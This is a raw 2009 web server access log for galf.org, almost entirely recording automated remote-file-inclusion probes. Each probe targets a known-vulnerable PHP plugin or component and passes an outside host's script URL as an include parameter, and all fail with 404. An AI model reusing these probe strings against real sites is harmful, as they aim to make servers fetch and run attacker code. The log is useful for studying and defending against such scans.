222.122.72.216 - - [21/Sep/2009:13:44:46 -0700] "GET /logs//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [21/Sep/2009:13:44:46 -0700] "GET /logs/access_090720.log%20%20//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.23.2.21 - - [21/Sep/2009:13:44:56 -0700] "GET /logs/access_090608.log/playing.php/common/db.php?commonpath=http://ddlfilez.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
94.23.2.21 - - [21/Sep/2009:13:44:56 -0700] "GET /playing.php/common/db.php?commonpath=http://ddlfilez.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
94.23.2.21 - - [21/Sep/2009:13:44:56 -0700] "GET /logs/playing.php/common/db.php?commonpath=http://ddlfilez.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
222.122.72.216 - - [21/Sep/2009:13:45:03 -0700] "GET /logs//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [21/Sep/2009:13:45:03 -0700] "GET /wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [21/Sep/2009:13:45:03 -0700] "GET /logs/access_090720.log%20%20//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [21/Sep/2009:13:45:17 -0700] "GET /logs//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [21/Sep/2009:13:45:17 -0700] "GET /logs/access_090720.log%20%20//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [21/Sep/2009:13:45:17 -0700] "GET /wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [21/Sep/2009:13:45:52 -0700] "GET /wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [21/Sep/2009:13:45:53 -0700] "GET /logs/access_090720.log%20%20//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [21/Sep/2009:13:45:53 -0700] "GET /logs//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.203.180.144 - - [21/Sep/2009:13:46:09 -0700] "GET /logs/access.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.203.180.144 - - [21/Sep/2009:13:46:32 -0700] "GET /logs/access.log%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.23.2.21 - - [21/Sep/2009:13:47:17 -0700] "GET /logs/access_090615.log/playing.php/common/db.php?commonpath=http://ddlfilez.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
118.168.12.133 - - [21/Sep/2009:13:47:48 -0700] "GET /index.php3?s=http://www.medisite.fr/id??? HTTP/1.0" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.galf.org"
212.98.171.91 - - [21/Sep/2009:13:47:57 -0700] "GET /logs//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [21/Sep/2009:13:47:57 -0700] "GET /wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [21/Sep/2009:13:47:57 -0700] "GET /logs/access_090720.log%20%20//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [21/Sep/2009:13:48:01 -0700] "GET /wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [21/Sep/2009:13:48:01 -0700] "GET /logs//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [21/Sep/2009:13:48:04 -0700] "GET /logs/access_090720.log%20%20//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [21/Sep/2009:13:48:08 -0700] "GET /logs/access_090720.log%20%20//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [21/Sep/2009:13:48:08 -0700] "GET /logs//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [21/Sep/2009:13:48:09 -0700] "GET /logs//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [21/Sep/2009:13:48:11 -0700] "GET /logs/access_090720.log%20%20//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [21/Sep/2009:13:48:29 -0700] "GET /logs//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [21/Sep/2009:13:48:29 -0700] "GET /wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [21/Sep/2009:13:48:29 -0700] "GET /wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [21/Sep/2009:13:48:29 -0700] "GET /wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [21/Sep/2009:13:48:29 -0700] "GET /logs/access_090720.log%20%20//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [21/Sep/2009:13:48:29 -0700] "GET /logs//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [21/Sep/2009:13:48:29 -0700] "GET /logs/access_090720.log%20%20//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [21/Sep/2009:13:48:30 -0700] "GET /logs//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [21/Sep/2009:13:48:30 -0700] "GET /logs/access_090720.log%20%20//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [21/Sep/2009:13:48:34 -0700] "GET /wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [21/Sep/2009:13:48:34 -0700] "GET /logs//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [21/Sep/2009:13:48:34 -0700] "GET /logs/access_090720.log%20%20//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [21/Sep/2009:13:48:42 -0700] "GET /logs//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [21/Sep/2009:13:48:45 -0700] "GET /logs/access_090720.log%20%20//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [21/Sep/2009:13:48:47 -0700] "GET /wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [21/Sep/2009:13:48:47 -0700] "GET /logs//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [21/Sep/2009:13:48:50 -0700] "GET /logs/access_090720.log%20%20//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [21/Sep/2009:13:49:03 -0700] "GET /logs//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [21/Sep/2009:13:49:03 -0700] "GET /wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.98.171.91 - - [21/Sep/2009:13:49:05 -0700] "GET /logs/access_090720.log%20%20//wp-content/plugins/wordtube/myfunctions/wordtube-button.php?myPath=http://jdzin2.vfose.ru/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [21/Sep/2009:13:50:23 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [21/Sep/2009:13:50:23 -0700] "GET /logs/access_090817.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [21/Sep/2009:13:50:23 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [21/Sep/2009:13:51:58 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.rucoc.com/rucoc1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [21/Sep/2009:13:51:59 -0700] "GET /logs/access_090817.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.rucoc.com/rucoc1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [21/Sep/2009:13:51:59 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.rucoc.com/rucoc1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [21/Sep/2009:13:52:44 -0700] "GET /logs/access_090316.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [21/Sep/2009:13:53:05 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [21/Sep/2009:13:53:06 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [21/Sep/2009:13:53:06 -0700] "GET /logs/access_090706.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [21/Sep/2009:13:53:57 -0700] "GET /logs/access_090330.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.6.8.115 - - [21/Sep/2009:13:55:14 -0700] "GET /labia/?S=D HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
121.254.195.7 - - [21/Sep/2009:13:55:25 -0700] "GET /logs/access_090803.log/http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
121.254.195.7 - - [21/Sep/2009:13:55:25 -0700] "GET /http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
121.254.195.7 - - [21/Sep/2009:13:55:25 -0700] "GET /logs/http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:13:55:27 -0700] "GET /logs/access_090817.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:13:55:27 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:13:55:27 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:13:55:31 -0700] "GET /logs/access_090316.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:13:56:35 -0700] "GET /logs/access_090817.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:13:56:41 -0700] "GET /logs/access_090316.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.204.148.251 - - [21/Sep/2009:13:56:55 -0700] "GET /logs/access.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.204.148.251 - - [21/Sep/2009:13:56:55 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.204.148.251 - - [21/Sep/2009:13:56:55 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.204.148.251 - - [21/Sep/2009:13:58:07 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.204.148.251 - - [21/Sep/2009:13:58:07 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.204.148.251 - - [21/Sep/2009:13:58:08 -0700] "GET /logs/access_090420.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.43.194.3 - - [21/Sep/2009:13:58:20 -0700] "GET /logs/access_090511.log%20//modules/Forums/bb_smilies.php?name=http://soxs.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
208.43.194.3 - - [21/Sep/2009:13:58:20 -0700] "GET /modules/Forums/bb_smilies.php?name=http://soxs.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
208.43.194.3 - - [21/Sep/2009:13:58:20 -0700] "GET /logs//modules/Forums/bb_smilies.php?name=http://soxs.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
121.130.29.11 - - [21/Sep/2009:13:58:45 -0700] "GET /logs/access_090817.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.rucoc.com/rucoc1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.254.195.7 - - [21/Sep/2009:13:59:14 -0700] "GET /http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
121.130.29.11 - - [21/Sep/2009:13:59:20 -0700] "GET /logs/access_090316.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.rucoc.com/rucoc1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.220.59 - - [21/Sep/2009:13:59:46 -0700] "GET /bbs/include/print_category.php?setup[use_category]=1&dir=http://ipts.co.kr/bbs/upload/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.220.59 - - [21/Sep/2009:13:59:46 -0700] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://ipts.co.kr/bbs/upload/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.220.59 - - [21/Sep/2009:13:59:46 -0700] "GET /logs/access_090223.log%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://ipts.co.kr/bbs/upload/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.220.59 - - [21/Sep/2009:13:59:50 -0700] "GET /logs/access_090622.log%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://ipts.co.kr/bbs/upload/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:14:01:48 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rox-crime2.no-ip.org:8080/scan/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:14:01:48 -0700] "GET /logs/access_090817.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rox-crime2.no-ip.org:8080/scan/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:14:01:48 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rox-crime2.no-ip.org:8080/scan/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:14:03:55 -0700] "GET /logs/access_090817.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rox-crime2.no-ip.org:8080/scan/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.254.195.7 - - [21/Sep/2009:14:04:06 -0700] "GET /logs/access_090223.log/http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
79.174.78.83 - - [21/Sep/2009:14:04:29 -0700] "GET /logs/access_090316.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rox-crime2.no-ip.org:8080/scan/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.220.59 - - [21/Sep/2009:14:05:29 -0700] "GET /logs/access.log//bbs/include/print_category.php?setup[use_category]=1&dir=http://ipts.co.kr/bbs/upload/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
221.143.40.39 - - [21/Sep/2009:14:07:53 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
220.181.94.214 - - [21/Sep/2009:14:08:02 -0700] "GET /logs/ HTTP/1.1" 200 4799 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.galf.org"
67.19.155.98 - - [21/Sep/2009:14:08:33 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.medisite.fr/id??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
67.19.155.98 - - [21/Sep/2009:14:08:33 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.medisite.fr/id??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
195.190.166.35 - - [21/Sep/2009:14:12:11 -0700] "GET /logs/access.log/admin.php?include_path=http://www.impulsoacc.com/impulsoventas/images/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
195.190.166.35 - - [21/Sep/2009:14:12:11 -0700] "GET /admin.php?include_path=http://www.impulsoacc.com/impulsoventas/images/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
195.190.166.35 - - [21/Sep/2009:14:12:12 -0700] "GET /logs/admin.php?include_path=http://www.impulsoacc.com/impulsoventas/images/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
221.143.40.39 - - [21/Sep/2009:14:12:53 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.rhythmer.net/zb41/data/id.txt%0D?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
221.143.40.39 - - [21/Sep/2009:14:13:40 -0700] "GET /logs/access_090817.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:14:15:17 -0700] "GET /tools/send_reminders.php?includedir=http://space.jpl.nasa.gov/analog.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:14:15:17 -0700] "GET /logs//tools/send_reminders.php?includedir=http://space.jpl.nasa.gov/analog.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:14:15:17 -0700] "GET /logs/access_090713.log//tools/send_reminders.php?includedir=http://space.jpl.nasa.gov/analog.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:14:16:04 -0700] "GET /logs/access_090511.log//tools/send_reminders.php?includedir=http://space.jpl.nasa.gov/analog.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
221.143.40.39 - - [21/Sep/2009:14:16:19 -0700] "GET /logs/access_090316.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.6.107.34 - - [21/Sep/2009:14:16:45 -0700] "GET /appserv/main.php?appserv_root=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
64.6.107.34 - - [21/Sep/2009:14:16:45 -0700] "GET /logs/access.log%20%20/appserv/main.php?appserv_root=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
64.6.107.34 - - [21/Sep/2009:14:16:45 -0700] "GET /logs/appserv/main.php?appserv_root=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
123.213.63.137 - - [21/Sep/2009:14:19:47 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
123.213.63.137 - - [21/Sep/2009:14:19:47 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
123.213.63.137 - - [21/Sep/2009:14:19:47 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
123.213.63.137 - - [21/Sep/2009:14:19:47 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
